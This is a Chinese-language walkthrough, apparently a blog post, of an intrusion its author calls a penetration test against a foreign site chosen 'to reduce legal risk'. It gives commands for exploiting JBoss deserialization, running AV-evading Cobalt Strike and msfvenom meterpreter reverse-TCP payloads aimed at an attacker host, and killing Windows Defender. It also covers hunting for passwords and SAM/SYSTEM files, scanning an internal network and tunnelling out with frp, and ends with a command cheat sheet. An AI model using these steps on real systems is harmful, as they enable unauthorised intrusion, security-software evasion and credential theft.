记一次内网横向免杀对抗渗透测试
字数 1555 2025-08-24 16:48:07
内网横向渗透与免杀对抗实战教学文档
1. 外网打点与初始访问
1.1 目标发现与漏洞利用
-
目标选择:选择国外站点进行练习,降低法律风险
-
漏洞发现:
- 发现JBoss网站存在反序列化漏洞
- 使用jexboss工具尝试利用失败:
python jexboss.py -u https://xx.xx.xx/ - 改用"java反序列化终极测试工具"成功利用
-
初始信息收集:
whoami # 查看当前用户 ipconfig # 查看IP地址 tasklist /svc # 查看进程和服务 ping www.baidu.com # 检查出网情况 -
杀软检测:
- 将进程列表粘贴到Windows杀软在线查询工具确认存在杀软
2. Cobalt Strike上线与免杀技术
2.1 免杀马生成与上传
-
免杀方案选择:
- 使用潮汐shellcode免杀工具(体积小,上传快)
- 避免使用Python打包的exe(体积过大)
-
操作步骤:
- CS生成C语言格式的shellcode
- 将shellcode复制到潮汐网站生成免杀exe
- 上传并执行:
C:\usr\desarrollo\jboss-5.1.0.GA\server\sigAmeServer\deploy\ROOT.war\TideAv-Go1-2023-02-04-10-31-21-221261.exe tide
3. 权限提升与信息收集
3.1 系统信息收集
-
基础信息收集:
whoami /priv # 查看用户特权 systeminfo # 系统详细信息 netstat -ano # 网络连接和端口 ipconfig /all # 详细网络配置 arp -a # ARP表 -
域环境确认:
- 通过
systeminfo确认存在域环境(ame.local)
- 通过
3.2 提权尝试
-
CS自带插件提权:
- 尝试失败,提权进程被杀软发现
-
杀软进程终止:
tskill MsMpEng # 结束杀软进程 tasklist /svc # 确认进程已结束 -
Windows-Exploit-Suggester:
python2 -m pip install --user xlrd==1.1.0 python2 windows-exploit-suggester.py --update python2 ./windows-exploit-suggester.py --database 2023-02-06-mssb.xls --systeminfo systeminfo.txt- 上传exp测试均失败
-
PEASS-ng尝试:
- 上传winPEASany.exe被杀软拦截
3.3 敏感信息收集
-
密码文件位置:
- SYSTEM文件:
C:\Windows\System32\config\SYSTEM - SAM文件:
C:\Windows\System32\config\SAM
- SYSTEM文件:
-
文件搜索技巧:
dir %APPDATA%\Microsoft\Windows\Recent # 最近文档 findstr /si password config.* *.ini *.txt *.properties # 搜索密码 dir /a /s /b "*conf*" > 1.txt # 搜索配置文件 for /r 目录 %i in (account.docx,pwd.docx,login.docx,login*.xls) do @echo %i >> C:\tmp\123.txt -
PrintSpoofer提权:
PrintSpoofer.exe -i -c cmd # 尝试失败
4. 横向渗透
4.1 fscan扫描
-
扫描命令:
"C:/Users/appusr/fscan64.exe" -h 172.16.2.1/24 -
扫描结果分析:
- 存活35个IP
- 发现漏洞:
- Postgres弱口令:172.16.2.200:5432 postgres/123456
- MS17-010漏洞:172.16.2.5 (Windows Server 2003)
- SSH弱口令:172.16.2.87:22 admin/admin
4.2 frp内网穿透
-
服务端配置 (frps.ini):
[common] bind_addr = 0.0.0.0 bind_port = 7080 token = admin123 dashboard_user = admin dashboard_pwd = admin123 -
客户端配置 (frpc.ini):
[common] server_addr = xx.xx.xx.xx server_port = 7080 token = admin123 tls_enable=true pool_count=5 [plugin_socks] type = tcp remote_port = 4566 plugin = socks5 plugin_user = admin plugin_passwd = admin123 use_encryption = true use_compression = true -
执行与验证:
shell "C:/usr/desarrollo/jboss-5.1.0.GA/server/sigAmeServer/deploy/ROOT.war/frpc.exe -c C:/usr/desarrollo/jboss-5.1.0.GA/server/sigAmeServer/deploy/ROOT.war/frpc.ini"- 使用FoxyProxy配置代理验证穿透成功
5. 免杀技术深入
5.1 潮汐在线免杀
-
生成shellcode:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.xx LPORT=3333 -f c > shell.c -
生成免杀马:
- 将shellcode粘贴到潮汐网站生成exe
5.2 Ant-AntV免杀
-
生成bin文件:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.xx LPORT=5555 -f raw -o 1.bin -
生成免杀马:
python3 gen_trojan.py
5.3 CuiRi免杀
-
生成shellcode:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xx.xx.xx.xx LPORT=3333 -f c > shell.c -
生成免杀马:
.\cuiri_win64.exe -f msf.txt
5.4 AniYa免杀
- 生成免杀马:
- 使用工具生成exe文件
6. 其他攻击路径尝试
6.1 Postgresql getshell
- 连接尝试:
- 使用Navicat连接Postgresql
- 发现目标为CentOS系统,放弃此路径
6.2 VMware vSphere漏洞利用
- 漏洞搜索:
- Google搜索VMware vSphere RCE漏洞
- 测试发现不存在可利用漏洞
7. 总结与经验
-
技术总结:
- 公开免杀工具已难以绕过现代杀软,需深入研究免杀技术
- Kali Linux的proxychains在实战中存在问题,需进一步排查
- fscan扫描出的内网目标未充分测试
-
改进方向:
- 加强免杀技术研究
- 解决代理工具兼容性问题
- 提高内网渗透的深度和广度
-
工具列表:
- Cobalt Strike 4.3
- Windows杀软在线查询工具
- fscan
- 潮汐shellcode免杀
- LSTAR
- PEASS-ng
- PrintSpoofer
- frp
- Metasploit
- 多种免杀工具(Ant-AntV、CuiRi、AniYa等)
-
关键命令速查:
# 信息收集 systeminfo netstat -ano ipconfig /all whoami /priv # 文件搜索 findstr /si password *.config *.ini *.txt dir /a /s /b "*pass*" > results.txt # 横向移动 fscan64.exe -h 172.16.2.1/24